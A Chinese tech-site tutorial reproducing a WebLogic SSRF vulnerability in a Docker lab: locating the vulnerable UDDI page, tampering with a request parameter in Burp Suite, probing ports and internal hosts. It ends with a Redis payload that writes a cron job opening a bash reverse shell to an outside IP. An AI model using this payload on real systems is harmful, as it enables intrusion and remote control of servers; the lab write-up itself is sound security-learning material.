您的位置：首页 > 技术中心 > 运维 >

如何实现Weblogic SSRF漏洞复现

时间：2023-05-15 05:54

一、使用docker搭建环境

docker安装及搭建环境教程：https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

访问7001端口如何实现Weblogic SSRF漏洞复现

二、漏洞复现步骤

1、漏洞存在页面 /uddiexplorer/SearchPublicRegistries.jsp

如何实现Weblogic SSRF漏洞复现

2、检查一下IBM这个地方看看

如何实现Weblogic SSRF漏洞复现

发现是个连接，这就可能存在ssrf了

3、使用burp suite抓包，点击Search

如何实现Weblogic SSRF漏洞复现

如何实现Weblogic SSRF漏洞复现

4、修改operator参数的连接

如何实现Weblogic SSRF漏洞复现

5、访问结果

访问不存在的端口返回 could not connect over HTTP

如何实现Weblogic SSRF漏洞复现

访问存在的端口返回状态码

如何实现Weblogic SSRF漏洞复现

访问内网

如何实现Weblogic SSRF漏洞复现

利用redis反弹shell的payload

set 1 "



* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1



"config set dir /etc/config set dbfilename crontabsave

以上就是如何实现Weblogic SSRF漏洞复现的详细内容，更多请关注Gxl网其它相关文章！

相关推荐

电脑软件

热门排行

今日推荐

优途云视官方版

版本：v2.8.6.0

大小：37.67MB

日期：2025-01-01
快来用车安卓版

版本：v1.8.3

大小：30.67MB

日期：2025-01-01
蜗牛盾完整版

版本：v2.4.7

大小：4.69MB

日期：2025-01-01
飘飘漫画永久免费版

版本：2.40.00

大小：11.54MB

日期：2025-01-01
漫猫猫漫画免费版

版本：2.0

大小：0.55MB

日期：2025-01-01
天天拼图正版

版本：v6.0.3

大小：38.31MB

日期：2025-01-01

热门手游

商场购物模拟器官方版

版本：v1.0.9

大小：46.11MB

日期：2024-12-16
滚动方块大冒险免费版

版本：v1.0.5

大小：26.10MB

日期：2024-12-16
恋恋奇缘体验服版

版本：v1.0.0

大小：131.33MB

日期：2024-12-16
炉石传说官方正版

版本：v1.0

大小：100.52MB

日期：2024-12-16
人群大师免费版

版本：v2.15.0

大小：57.68MB

日期：2024-12-16
方鸡跳跑单机版

版本：v1

大小：63.49MB

日期：2024-12-16